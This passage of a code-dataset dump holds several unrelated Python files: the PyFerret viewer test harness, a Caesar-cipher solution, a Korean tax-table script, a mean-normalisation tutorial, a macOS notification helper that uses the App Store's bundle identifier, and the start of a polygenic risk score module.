line widths and symbol sizes\n to convert from points (1/72 inches) to pixels, and to apply\n any additional width scaling specified by setWidthFactor.\n '''\n return self.__widthfactor\n\n def setWaterMark(self, filename, len_filename, xloc, yloc, scalefrac, opacity):\n '''\n Overlay watermark from contents of filename.\n\n Recognized keys from cmnd:\n \"filename\": water mark image file\n \"xloc\": horizontal position of upper left corner of watermark image\n \"yloc\": vertical position of upper left corner of watermark image\n \"scalefrac\": multiple of original image size to display plot as\n \"opacity\": image visibility in range [0.0, 1.0] where 0->invisible, 1->opaque\n '''\n self.__wmarkFilename = str(filename)\n self.__xloc = xloc\n self.__yloc = yloc\n self.__scalefrac = scalefrac\n 
self.__opacity = opacity\n\nclass PipedViewerPQProcess(Process):\n '''\n A Process specifically tailored for creating a PipedViewerPQ.\n '''\n def __init__(self, cmndpipe, rspdpipe):\n '''\n Create a Process that will produce a PipedViewerPQ\n attached to the given Pipes when run.\n '''\n super(PipedViewerPQProcess,self).__init__(group=None, target=None, name='PipedViewerPQ')\n self.__cmndpipe = cmndpipe\n self.__rspdpipe = rspdpipe\n self.__app = None\n self.__viewer = None\n\n def run(self):\n '''\n Create a PipedViewerPQ that is attached\n to the Pipe of this instance.\n '''\n self.__app = QApplication([\"PipedViewerPQ\"])\n self.__viewer = PipedViewerPQ(self.__cmndpipe, self.__rspdpipe)\n myresult = self.__app.exec_()\n sys.exit(myresult)\n\n\n#\n# The following are for testing this (and the cmndhelperpq) modules\n#\n\nclass _CommandSubmitterPQ(QDialog):\n '''\n Testing dialog for controlling the addition of commands to a pipe.\n Used for testing PipedViewerPQ in the same process as the viewer.\n '''\n def __init__(self, parent, cmndpipe, rspdpipe, cmndlist):\n '''\n Create a QDialog with a single QPushButton for controlling\n the submission of commands from cmndlist to cmndpipe.\n '''\n super(_CommandSubmitterPQ,self).__init__(parent)\n self.__cmndlist = cmndlist\n self.__cmndpipe = cmndpipe\n self.__rspdpipe = rspdpipe\n self.__nextcmnd = 0\n self.__button = QPushButton(\"Submit next command\", self)\n self.__button.pressed.connect(self.submitNextCommand)\n self.show()\n\n def submitNextCommand(self):\n '''\n Submit the next command from the command list to the command pipe,\n or shutdown if there are no more commands to submit.\n '''\n try:\n print(\"Command: %s\" % str(self.__cmndlist[self.__nextcmnd]))\n self.__cmndpipe.send(self.__cmndlist[self.__nextcmnd])\n self.__nextcmnd += 1\n while self.__rspdpipe.poll(0.1):\n print(\"Response: %s\" % str(self.__rspdpipe.recv()))\n except IndexError:\n self.__rspdpipe.close()\n self.__cmndpipe.close()\n self.close()\n\n\ndef _test_pipedviewerpq():\n # vertices of a pentagon (roughly) centered in a 1000 x 1000 square\n pentagonpts = ( (504.5, 100.0), (100.0, 393.9),\n (254.5, 869.4), (754.5, 869.4),\n (909.0, 393.9), )\n\n # create the list of commands to submit\n drawcmnds = []\n drawcmnds.append( { \"action\":\"setTitle\", \"title\":\"Tester\" } )\n drawcmnds.append( { \"action\":\"show\" } )\n drawcmnds.append( { \"action\":\"clear\", \"color\":\"black\"} )\n drawcmnds.append( { \"action\":\"screenInfo\"} )\n drawcmnds.append( { \"action\":\"antialias\", \"antialias\":True } )\n drawcmnds.append( { \"action\":\"resize\",\n \"width\":500,\n \"height\":500 } )\n drawcmnds.append( { \"action\":\"beginView\",\n \"viewfracs\":{\"left\":0.0, \"right\":0.5,\n \"top\":0.5, \"bottom\":1.0},\n \"clip\":True } )\n drawcmnds.append( { \"action\":\"drawRectangle\",\n \"left\": 5, \"right\":245,\n \"top\":245, \"bottom\":495,\n \"fill\":{\"color\":\"green\", \"alpha\":128} } )\n mypentapts = [ (.25 * ptx, .25 * pty + 250) for (ptx, pty) in pentagonpts ]\n drawcmnds.append( { \"action\":\"drawPolygon\",\n \"points\":mypentapts,\n \"fill\":{\"color\":\"blue\"},\n \"outline\":{\"color\":\"black\",\n \"width\": 5,\n \"style\":\"solid\",\n \"capstyle\":\"round\",\n \"joinstyle\":\"round\" } } )\n drawcmnds.append( { \"action\":\"beginSegment\",\n \"segid\":\"text\" } )\n drawcmnds.append( { \"action\":\"drawText\",\n \"text\":\"y=480\",\n \"font\":{\"family\":\"Times\", \"size\":16},\n \"fill\":{\"color\":\"red\"},\n \"location\":(50,480) } )\n 
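# The drawText commands above and below differ only in their y\n # coordinate; all of them belong to the \"text\" segment begun above\n # and are removed later by the deleteSegment command.\n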
drawcmnds.append( { \"action\":\"drawText\",\n \"text\":\"y=430\",\n \"font\":{\"family\":\"Times\", \"size\":16},\n \"fill\":{\"color\":\"red\"},\n \"location\":(50,430) } )\n drawcmnds.append( { \"action\":\"drawText\",\n \"text\":\"y=380\",\n \"font\":{\"family\":\"Times\", \"size\":16},\n \"fill\":{\"color\":\"red\"},\n \"location\":(50,380) } )\n drawcmnds.append( { \"action\":\"drawText\",\n \"text\":\"y=330\",\n \"font\":{\"family\":\"Times\", \"size\":16},\n \"fill\":{\"color\":\"red\"},\n \"location\":(50,330) } )\n drawcmnds.append( { \"action\":\"textSize\",\n \"text\":\"This is a some line of text\",\n \"font\":{\"family\":\"Times\", \"size\":16} } )\n drawcmnds.append( { \"action\":\"endSegment\" } )\n drawcmnds.append( { \"action\":\"endView\" } )\n drawcmnds.append( { \"action\":\"show\" } )\n drawcmnds.append( { \"action\":\"createSymbol\",\n \"name\": \"uptrifill\",\n \"pts\": ( (-40.0, -30.0), (0.0, 40.0), (40.0, -30.0), (-40.0, -30.0), ),\n \"fill\": True } )\n drawcmnds.append( { \"action\":\"createSymbol\",\n \"name\": \"bararrow\",\n \"pts\": ( (-50,50), (-10,10),\n (-999, -999),\n (50,0), (50,50), (0,50),\n (-999, -999),\n (0,-10), (20,-30), (10,-30), (10,-50), (-10,-50), (-10,-30), (-20,-30), (0,-10), ),\n \"fill\": False } )\n drawcmnds.append( { \"action\":\"beginView\",\n \"viewfracs\":{\"left\":0.0, \"right\":1.0,\n \"top\":0.0, \"bottom\":1.0},\n \"clip\":True } )\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (100, 50),\n (100, 150),\n (100, 250),\n (100, 350),\n (100, 450) ),\n \"symbol\":\"dot\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (150, 50),\n (150, 150),\n (150, 250),\n (150, 350),\n (150, 450) ),\n \"symbol\":\"circle\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (200, 50),\n (200, 150),\n (200, 250),\n (200, 350),\n (200, 450) ),\n \"symbol\":\"dotplus\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (250, 50),\n (250, 150),\n (250, 250),\n (250, 350),\n (250, 450) ),\n \"symbol\":\"circplus\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (300, 50),\n (300, 150),\n (300, 250),\n (300, 350),\n (300, 450) ),\n \"symbol\":\"dotex\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (350, 50),\n (350, 150),\n (350, 250),\n (350, 350),\n (350, 450) ),\n \"symbol\":\"circex\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (400, 50),\n (400, 150),\n (400, 250),\n (400, 350),\n (400, 450) ),\n \"symbol\":\"uptrifill\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawPoints\",\n \"points\":( (450, 50),\n (450, 150),\n (450, 250),\n (450, 350),\n (450, 450) ),\n \"symbol\":\"bararrow\",\n \"size\":20,\n \"color\":\"magenta\" })\n drawcmnds.append( { \"action\":\"drawMultiline\",\n \"points\":( (350, 50),\n (200, 150),\n (400, 250),\n (300, 350),\n (150, 250),\n (100, 450) ),\n \"pen\": {\"color\":\"white\",\n \"width\":3,\n \"style\":\"dash\",\n \"capstyle\":\"round\",\n \"joinstyle\":\"round\"} } )\n drawcmnds.append( { \"action\":\"endView\" } )\n drawcmnds.append( { \"action\":\"show\" } )\n drawcmnds.append( { \"action\":\"deleteSegment\",\n \"segid\":\"text\" } )\n drawcmnds.append( { \"action\":\"update\" } )\n drawcmnds.append( { 
\"action\":\"show\" } )\n    annotations = ( \"The 1st CO2 annotations line\",\n                    \"Another line with lengthy details that go on and on \" + \\\n                    \"and on and should wrap to a 2nd annotation line\",\n                    \"Final annotation line\" )\n    drawcmnds.append( { \"action\":\"save\",\n                        \"filename\":\"test.pdf\",\n                        \"vectsize\":{\"width\":7.0, \"height\":7.0},\n                        \"rastsize\":{\"width\":750, \"height\":750},\n                        \"annotations\":annotations } )\n    drawcmnds.append( { \"action\":\"save\",\n                        \"filename\":\"test.png\",\n                        \"vectsize\":{\"width\":7.0, \"height\":7.0},\n                        \"rastsize\":{\"width\":750, \"height\":750},\n                        \"annotations\":annotations } )\n    drawcmnds.append( { \"action\":\"exit\" } )\n\n    # start PyQt\n    app = QApplication([\"PipedViewerPQ\"])\n    # create a PipedViewerPQ in this process\n    cmndrecvpipe, cmndsendpipe = Pipe(False)\n    rspdrecvpipe, rspdsendpipe = Pipe(False)\n    viewer = PipedViewerPQ(cmndrecvpipe, rspdsendpipe)\n    # create a command submitter dialog\n    tester = _CommandSubmitterPQ(viewer, cmndsendpipe,\n                                 rspdrecvpipe, drawcmnds)\n    tester.show()\n    # let it all run\n    result = app.exec_()\n    if result != 0:\n        sys.exit(result)\n\nif __name__ == \"__main__\":\n    _test_pipedviewerpq()\n","repo_name":"NOAA-PMEL/PyFerret","sub_path":"pviewmod/pipedviewerpq.py","file_name":"pipedviewerpq.py","file_ext":"py","file_size_in_byte":87249,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"21"} +{"seq_id":"23693203060","text":"#프로그래머스 - 시저 암호 (12926)\ndef solution(s, n):\n    answer = \"\"\n    for i in range(len(s)):\n        if not s[i] == \" \":\n            if s[i].isupper() and ord(s[i]) + n > 90:\n                tmp = ord(s[i]) + n - 90\n                answer += chr(64 + tmp)\n            elif s[i].islower() and ord(s[i]) + n > 122:\n                tmp = ord(s[i]) + n - 122\n                answer += chr(96 + tmp)\n            else:\n                answer += (chr(ord(s[i]) + n))\n        else:\n            answer += \" \"\n    return answer\n","repo_name":"yeonjy/AlgorithmChallenge","sub_path":"Programmers/Level1/Python/pgm12926.py","file_name":"pgm12926.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11659213682","text":"file_c=open('근로소득세.txt','r',encoding='UTF-8')\nlist_all=file_c.readlines()\nprint(list_all)\n\n\nsalary=float(input(\"세전연봉:\"))\nnotax=float(input(\"비과세액:\"))\nfamily=int(input(\"부양가족수(본인포함):\"))\n\n\ndef sepList(x,y):\n    list_1 = []\n    list_2 = []\n    list_3 = []\n\n    dic={}\n    for i in list_all:\n        if \",\" in i:\n            list_1.append(i)\n\n    for i in list_1:\n        temp = i.replace(',', '').replace('-', '0').replace('원', '').replace('x', '').replace('\\n','').rstrip()\n        list_2.append(temp)\n\n    for i in list_2:\n        list_3.append(i.split('\\t'))\n\n    for i in list_3:\n        i[2:] = map(int, i[2:])\n        dic[int(i[0]) <= x*0.0001 < int(i[1])] = i[2:]\n        print(dic)\n    krsds=dic[1][y-1]\n    return krsds\n\nresult=sepList(salary,family)\nprint(result)\n\nraw=open('ㅇㅁ.txt','r',encoding='UTF-8')\nrawdata=raw.readlines()\nprint(rawdata)\nlista=[]\nfor i in range(len(rawdata)):\n    rawdata[i]=rawdata[i].split('\\t')\nprint(rawdata)\ndef changeX(x,y=''):\n    for i in range(len(rawdata)):\n        for j in range(len(rawdata[i])):\n            if x in rawdata[i][j]:\n                rawdata[i][j]=rawdata[i][j].replace(x,y)\nchangeX('\\n')\nprint(rawdata)","repo_name":"seungwan97/Python","sub_path":"220404.py","file_name":"220404.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4965837151","text":"\"\"\" \r\nFeature Scaling\r\n- We discussed previously that 
the scale of the features is an important consideration when building machine \r\n learning models. \r\n\r\nBriefly:\r\n\r\nFeature magnitude matters because:\r\n- The regression coefficients of linear models are directly influenced by the scale of the variable.\r\n- Variables with bigger magnitude / larger value range dominate over those with smaller magnitude / value range\r\n- Gradient descent converges faster when features are on similar scales\r\n- Feature scaling helps decrease the time to find support vectors for SVMs\r\n- Euclidean distances are sensitive to feature magnitude.\r\n- Some algorithms, like PCA require the features to be centered at 0.\r\n\r\nThe machine learning models affected by the feature scale are:\r\n- Linear and Logistic Regression\r\n- Neural Networks\r\n- Support Vector Machines\r\n- KNN\r\n- K-means clustering\r\n- Linear Discriminant Analysis (LDA)\r\n- Principal Component Analysis (PCA)\r\n\r\nFeature Scaling\r\n- Feature scaling refers to the methods or techniques used to normalize the range of independent variables in our \r\n data, or in other words, the methods to set the feature value range within a similar scale. \r\n- Feature scaling is generally the last step in the data preprocessing pipeline, performed just before training the \r\n machine learning algorithms.\r\n\r\nThere are several Feature Scaling techniques, which we will discuss throughout this section:\r\n- Standardisation\r\n- Mean normalisation\r\n- Scaling to minimum and maximum values - MinMaxScaling\r\n- Scaling to maximum value - MaxAbsScaling\r\n- Scaling to quantiles and median - RobustScaling\r\n- Normalization to vector unit length\r\n\r\nIn this example, we will discuss Mean Normalisation.\r\n\r\n=================================================================\r\n\r\nMean Normalisation\r\n- Mean normalisation involves centering the variable at zero, and re-scaling to the value range. \r\n- The procedure involves subtracting the mean of each observation and then dividing by difference between the \r\n minimum and maximum value:\r\n\r\n x_scaled = (x - x_mean) / ( x_max - x_min)\r\n\r\n- The result of the above transformation is a distribution that is centered at 0, and its minimum and maximum values \r\n are within the range of -1 to 1. \r\n- The shape of a mean normalised distribution will be very similar to the original distribution of the variable, \r\n but the variance may change, so not identical.\r\n\r\n- Again, this technique will not normalize the distribution of the data thus if this is the desired outcome, we \r\n should implement any of the techniques discussed in section 0.5.\r\n\r\nIn a nutshell, mean normalisation:\r\n- centers the mean at 0\r\n- variance will be different\r\n- may alter the shape of the original distribution\r\n- the minimum and maximum values squeezed between -1 and 1\r\n- preserves outliers\r\n- Good for algorithms that require features centered at zero.\r\n\r\nIn this example\r\nWe will perform mean normalisation using the Boston House Prices data set that comes with Scikit-learn\r\n\r\nThere is no Scikit-learn transformer for mean normalisation, but we can implement it using a combination of 2 \r\nother transformers that I will discuss in detail in the next example. We will also implement it manually with pandas. 
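\r\nBefore moving on, a quick worked example of the formula (illustrative numbers only, not taken from any dataset): for the values [0, 5, 20], the mean is 8.333 and the value range is max - min = 20 - 0 = 20, so the scaled values are [(0 - 8.333) / 20, (5 - 8.333) / 20, (20 - 8.333) / 20] = [-0.417, -0.167, 0.583], which are centered near zero and fall inside [-1, 1].\r\n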
\"\"\"\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport seaborn as sns\r\n# dataset for the demo\r\nfrom sklearn.datasets import load_boston\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# the scaler - for mean normalisation\r\nfrom sklearn.preprocessing import StandardScaler, RobustScaler\r\n# load the the Boston House price data\r\n\r\nboston_dataset = load_boston()\r\n\r\n# create a dataframe with the independent variables\r\ndata = pd.DataFrame(boston_dataset.data,\r\n columns=boston_dataset.feature_names)\r\n\r\n# add target\r\ndata['MEDV'] = boston_dataset.target\r\n\r\ndata.head()\r\n\"\"\" \r\n \"\"\"\r\n\r\n# Information about the boston house prince dataset\r\n# you will find details about the different variables\r\n\r\n# the aim is to predict the \"Median value of the houses\"\r\n# MEDV column in this dataset\r\n\r\n# and there are variables with characteristics about\r\n# the homes and the neighborhoods\r\n\r\n# print the dataset description\r\nprint(boston_dataset.DESCR)\r\n\"\"\" .. _boston_dataset:\r\n\r\nBoston house prices dataset\r\n---------------------------\r\n\r\n**Data Set Characteristics:** \r\n\r\n :Number of Instances: 506 \r\n\r\n :Number of Attributes: 13 numeric/categorical predictive. Median Value (attribute 14) is usually the target.\r\n\r\n :Attribute Information (in order):\r\n - CRIM per capita crime rate by town\r\n - ZN proportion of residential land zoned for lots over 25,000 sq.ft.\r\n - INDUS proportion of non-retail business acres per town\r\n - CHAS Charles River dummy variable (= 1 if tract bounds river; 0 otherwise)\r\n - NOX nitric oxides concentration (parts per 10 million)\r\n - RM average number of rooms per dwelling\r\n - AGE proportion of owner-occupied units built prior to 1940\r\n - DIS weighted distances to five Boston employment centres\r\n - RAD index of accessibility to radial highways\r\n - TAX full-value property-tax rate per $10,000\r\n - PTRATIO pupil-teacher ratio by town\r\n - B 1000(Bk - 0.63)^2 where Bk is the proportion of blacks by town\r\n - LSTAT % lower status of the population\r\n - MEDV Median value of owner-occupied homes in $1000's\r\n\r\n :Missing Attribute Values: None\r\n\r\n :Creator: Harrison, D. and Rubinfeld, D.L.\r\n\r\nThis is a copy of UCI ML housing dataset.\r\nhttps://archive.ics.uci.edu/ml/machine-learning-databases/housing/\r\n\r\n\r\nThis dataset was taken from the StatLib library which is maintained at Carnegie Mellon University.\r\n\r\nThe Boston house-price data of Harrison, D. and Rubinfeld, D.L. 'Hedonic\r\nprices and the demand for clean air', J. Environ. Economics & Management,\r\nvol.5, 81-102, 1978. Used in Belsley, Kuh & Welsch, 'Regression diagnostics\r\n...', Wiley, 1980. N.B. Various transformations are used in the table on\r\npages 244-261 of the latter.\r\n\r\nThe Boston house-price data has been used in many machine learning papers that address regression\r\nproblems. \r\n \r\n.. topic:: References\r\n\r\n - Belsley, Kuh & Welsch, 'Regression diagnostics: Identifying Influential Data and Sources of Collinearity', Wiley, 1980. 244-261.\r\n - Quinlan,R. (1993). Combining Instance-Based and Model-Based Learning. In Proceedings on the Tenth International Conference of Machine Learning, 236-243, University of Massachusetts, Amherst. Morgan Kaufmann. 
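\r\n(Aside, not part of the DESCR output above: load_boston was deprecated in scikit-learn 1.0 and removed in 1.2, so running this demo as-is requires an older scikit-learn version.)\r\n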
\"\"\"\r\n\r\n# let's have a look at the main statistical parameters of the variables\r\n# to get an idea of the feature magnitudes\r\n\r\ndata.describe()\r\n\"\"\" \r\n\r\n\r\nThe different variables present different value ranges, mean, max, min, standard deviations, etc. In other words, they show different magnitudes or scales. Note for this demo, how the mean values are not centered at zero, and the min and max value vary across a big range.\r\n\r\nWhen performing mean normalisation on the data set, we need to first identify the mean and minimum and maximum values of the variables. These parameters need to be learned from the train set, stored, and then used to scale test and future data. Thus, we will first divide the data set into train and test, as we have done throughout the course.\r\n\"\"\"\r\n\r\n# let's separate the data into training and testing set\r\nX_train, X_test, y_train, y_test = train_test_split(data.drop('MEDV', axis=1),\r\n data['MEDV'],\r\n test_size=0.3,\r\n random_state=0)\r\n\r\nX_train.shape, X_test.shape\r\n# ((354, 13), (152, 13))\r\n\r\n\"\"\" Mean Normalisation with pandas \"\"\"\r\n# let's first learn the mean from the train set\r\n\r\nmeans = X_train.mean(axis=0)\r\n\r\nmeans\r\n\"\"\" \r\nCRIM 3.358284\r\nZN 11.809322\r\nINDUS 11.078757\r\nCHAS 0.064972\r\nNOX 0.556098\r\nRM 6.308427\r\nAGE 68.994068\r\nDIS 3.762459\r\nRAD 9.353107\r\nTAX 401.782486\r\nPTRATIO 18.473446\r\nB 360.601186\r\nLSTAT 12.440650\r\ndtype: float64 \"\"\"\r\n\r\n# let's now learn the min and max values, and the value range \r\n# from the train set\r\n\r\nranges = X_train.max(axis=0)-X_train.min(axis=0)\r\n\r\nranges\r\n\"\"\" CRIM 88.96988\r\nZN 100.00000\r\nINDUS 27.28000\r\nCHAS 1.00000\r\nNOX 0.48600\r\nRM 5.21900\r\nAGE 97.10000\r\nDIS 10.95230\r\nRAD 23.00000\r\nTAX 524.00000\r\nPTRATIO 9.40000\r\nB 396.58000\r\nLSTAT 35.25000\r\ndtype: float64 \"\"\"\r\n\r\n# now we are ready to perform mean normalisation:\r\nX_train_scaled = (X_train - means) / ranges\r\nX_test_scaled = (X_test - means) / ranges\r\n\r\n# let's have a look at the original training dataset: mean and min, max values\r\n# I use np.round to reduce the number of decimals to 1.\r\n\r\nnp.round(X_train.describe(), 1)\r\n\"\"\" \r\n \"\"\"\r\n\r\n# let's have a look at the scaled training dataset: mean and min, max values\r\n# I use np.round to reduce the number of decimals to 1.\r\n\r\nnp.round(X_train_scaled.describe(), 1)\r\n\"\"\" \r\n\r\n\r\n- As expected, the mean of each variable, which were not centered at zero, is now around zero and the min and max \r\n values vary approximately between -1 and 1. \r\n- Note however, that the standard deviations vary according to how spread the variable was to begin with and is highly \r\n influenced by the presence of outliers.\r\n\"\"\"\r\n\r\n# let's compare the variable distributions before and after scaling\r\n\r\nfig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(12, 5))\r\n\r\n# before scaling\r\nax1.set_title('Before Scaling')\r\nsns.kdeplot(X_train['RM'], ax=ax1)\r\nsns.kdeplot(X_train['LSTAT'], ax=ax1)\r\nsns.kdeplot(X_train['CRIM'], ax=ax1)\r\n\r\n# after scaling\r\nax2.set_title('After Mean Normalisation')\r\nsns.kdeplot(X_train_scaled['RM'], ax=ax2)\r\nsns.kdeplot(X_train_scaled['LSTAT'], ax=ax2)\r\nsns.kdeplot(X_train_scaled['CRIM'], ax=ax2)\r\nplt.show()\r\n\r\n\"\"\" \r\n- As we can see the main effect of mean normalisation was to center all the distributions at zero, and the values \r\n vary between -1 and 1. 
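- As a quick sanity check (a sketch using the variables defined above, on the training set only):\r\n\r\n      assert np.allclose(X_train_scaled.mean(axis=0), 0)\r\n      assert (X_train_scaled.min(axis=0) >= -1).all()\r\n      assert (X_train_scaled.max(axis=0) <= 1).all()\r\n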
\"\"\"\r\n\r\n# let's compare the variable distributions before and after scaling\r\n\r\nfig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(12, 5))\r\n\r\n# before scaling\r\nax1.set_title('Before Scaling')\r\nsns.kdeplot(X_train['AGE'], ax=ax1)\r\nsns.kdeplot(X_train['DIS'], ax=ax1)\r\nsns.kdeplot(X_train['NOX'], ax=ax1)\r\n\r\n# after scaling\r\nax2.set_title('After Mean Normalisation')\r\nsns.kdeplot(X_train_scaled['AGE'], ax=ax2)\r\nsns.kdeplot(X_train_scaled['DIS'], ax=ax2)\r\nsns.kdeplot(X_train_scaled['NOX'], ax=ax2)\r\nplt.show()\r\n\r\n\"\"\" \r\n- Compare these plots with those derived by standardisation in the previous notebook to better understand how these \r\n  procedures are not identical.\r\n\r\nMean Normalisation with Scikit-learn: work-around\r\n- We can implement mean normalisation by combining the use of 2 transformers. \r\n- A bit dirty, if you ask me, but if you are desperate to implement this technique with sklearn, this could be a way \r\n  forward.\r\n\"\"\"\r\n\r\n# set up the StandardScaler so that it removes the mean\r\n# but does not divide by the standard deviation\r\nscaler_mean = StandardScaler(with_mean=True, with_std=False)\r\n\r\n# set up the robustscaler so that it does NOT remove the median\r\n# but normalises by max()-min(), important for this to set up the\r\n# quantile range to 0 and 100, which represent the min and max values\r\nscaler_minmax = RobustScaler(with_centering=False,\r\n                             with_scaling=True,\r\n                             quantile_range=(0, 100))\r\n\r\n# fit the scalers to the train set so they learn the parameters\r\nscaler_mean.fit(X_train)\r\nscaler_minmax.fit(X_train)\r\n\r\n# transform train and test sets\r\nX_train_scaled = scaler_minmax.transform(scaler_mean.transform(X_train))\r\nX_test_scaled = scaler_minmax.transform(scaler_mean.transform(X_test))\r\n\r\n# let's transform the returned NumPy arrays to dataframes for the rest of the example\r\n\r\nX_train_scaled = pd.DataFrame(X_train_scaled, columns=X_train.columns)\r\nX_test_scaled = pd.DataFrame(X_test_scaled, columns=X_test.columns)\r\n\r\nnp.round(X_train_scaled.describe(), 1)\r\n\"\"\" \r\n\r\n\r\n- See how this output is identical to the above output, where we did the scaling manually. \r\n\r\n- That is all for this example. I hope you enjoyed the info, and see you in the next one.\"\"\"","repo_name":"Akshaykumarcp/ML-Feature-Engineering","sub_path":"0.8_feature_scaling/0.8.2_mean_normalisation.py","file_name":"0.8.2_mean_normalisation.py","file_ext":"py","file_size_in_byte":12558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22895421691","text":"#!/usr/bin/python\n\n# A simple example on how to dynamically send a NotificationCenter notification\n# which is similar in vein to Yo, but is written in pure python. 
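# Note: NSUserNotificationCenter has been deprecated since macOS 10.14 in favor of the\n# UserNotifications framework (UNUserNotificationCenter), so this technique may stop\n# working on newer macOS releases.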
You can spoof\n# any application icon, so if Apple ever deems this an issue, it could break.\n\n# Written by Erik Gomez, but most of this code was originally written by Greg\n# Neagle and Michael Lynn.\nfrom Foundation import (NSBundle, NSUserNotificationCenter, NSUserNotification)\nimport time\n\n\ndef set_fake_bundleid(bundleid):\n bundle = NSBundle.mainBundle()\n info = bundle.localizedInfoDictionary() or bundle.infoDictionary()\n # override the bundleid with the one we want\n info['CFBundleIdentifier'] = bundleid\n\n\ndef notify(title, bundleid=None):\n if bundleid:\n # fake our bundleid\n set_fake_bundleid(bundleid)\n\n # create a new user notification\n notification = NSUserNotification.alloc().init()\n notification.setTitle_(title)\n notification.setHasActionButton_(False)\n notification.setSoundName_(None)\n\n # get the default User Notification Center\n nc = NSUserNotificationCenter.defaultUserNotificationCenter()\n\n # Wait just a bit\n time.sleep(1)\n\n # Kill all old notifications so we can only show new notifications\n nc.removeAllDeliveredNotifications()\n\n # deliver the notification\n nc.deliverNotification_(notification)\n\n\ndef main():\n # Pass your text on the first argument and the bundleid you want to spoof\n # on the second.\n notify(u'Device Enrollment Beginning...', bundleid='com.apple.appstore')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"erikng/mdmscripts","sub_path":"dep/userscripts/notificationcenter_example.py","file_name":"notificationcenter_example.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"21"} +{"seq_id":"72138174454","text":"import coffee_machine_POO\nimport os\n\n# Creating menu items\n\nespresso = coffee_machine_POO.MenuItem(\"espresso\", 1.5, {\"water\": 50, \"milk\": 0, \"coffee\": 18})\nlatte = coffee_machine_POO.MenuItem(\"latte\", 2.5, {\"water\": 200, \"milk\": 150, \"coffee\": 24})\ncappuccino = coffee_machine_POO.MenuItem(\"cappuccino\", 3.0, {\"water\": 250, \"milk\": 100, \"coffee\": 24})\n\n# Resources\n# coffee_machine_POO.CoffeeMaker.initialIngredients()\n\ncoffee_machine = coffee_machine_POO.CoffeeMaker()\nmenu = coffee_machine_POO.Menu()\n\n\n\n\n\n\n\nmachine = \"on\"\nwhile machine != \"off\":\n \n # Cleaning screen\n os.system('cls')\n choice = input(\"What would you like? (espresso/latte/cappuccino): \")\n\n # Introduce \"report\" to see available ingredients\n if choice == \"report\":\n coffee_machine.report()\n else:\n drink = menu.find_drink(choice)\n if coffee_machine.is_resource_sufficient((drink)):\n coffee_machine.make_coffee(drink)\n else:\n print(\"Sorry, there are not enough ingredients\")\n\n machine = input(\"Would you like another drink? 
('on' to continue, 'off' to finish) :\")","repo_name":"cynthiatcelorio/100_days_of_code-Pyhton","sub_path":"days_11-20/day16 (POO)/coffee_main.py","file_name":"coffee_main.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22903887032","text":"class ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution(object):\n def mergeKLists(self, lists):\n if not len(lists) or len(lists) == 1:\n return lists[0] if lists else None\n \n mid = len(lists) // 2\n left, right = self.mergeKLists(lists[:mid]), self.mergeKLists(lists[mid:])\n return self.merge(left, right)\n \n def merge(self, list1, list2):\n curr = dummy = ListNode()\n \n while list1 and list2:\n if list1.val > list2.val:\n curr.next = list2\n list2 = list2.next\n else:\n curr.next = list1 \n list1 = list1.next\n \n curr = curr.next\n \n if list1:\n curr.next = list1\n elif list2:\n curr.next = list2\n \n return dummy.next\n \n\nclass Solution:\n def mergeKLists(self, lists):\n if not lists or len(lists) == 0:\n return None\n\n while len(lists) > 1:\n mergedLists = []\n for i in range(0, len(lists), 2):\n l1 = lists[i]\n l2 = lists[i + 1] if (i + 1) < len(lists) else None\n mergedLists.append(self.mergeList(l1, l2))\n lists = mergedLists\n return lists[0]\n\n def mergeList(self, l1, l2):\n dummy = ListNode()\n tail = dummy\n\n while l1 and l2:\n if l1.val < l2.val:\n tail.next = l1\n l1 = l1.next\n else:\n tail.next = l2\n l2 = l2.next\n tail = tail.next\n if l1:\n tail.next = l1\n if l2:\n tail.next = l2\n return dummy.next","repo_name":"merthamit/Over-300-leetcode-solutions","sub_path":"leetcodes questions/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72681905014","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n#----------------------------------------------------------------------------\n# Created By: David Aurelia Ayala Usma\n# Created Date: 2022-09-13\n# Version = 0.0.1\n# ---------------------------------------------------------------------------\n\n## Description\n\"\"\"Main module to calculate two Polygenic Risk Score models for several individuals\"\"\"\n\n# ---------------------------------------------------------------------------\n## Required libraries\nimport os\nimport argparse\nimport numpy as np\nimport requests as rq\nfrom datetime import datetime\nfrom timeit import default_timer as timer\n\n## Parallelized pandas\nos.environ[\"MODIN_ENGINE\"] = \"ray\"\nimport ray\nray.init()\nimport modin.pandas as pd\n\n# ---------------------------------------------------------------------------\n## Importing the individual PRS module\nimport individual_prs as prs\n\n# 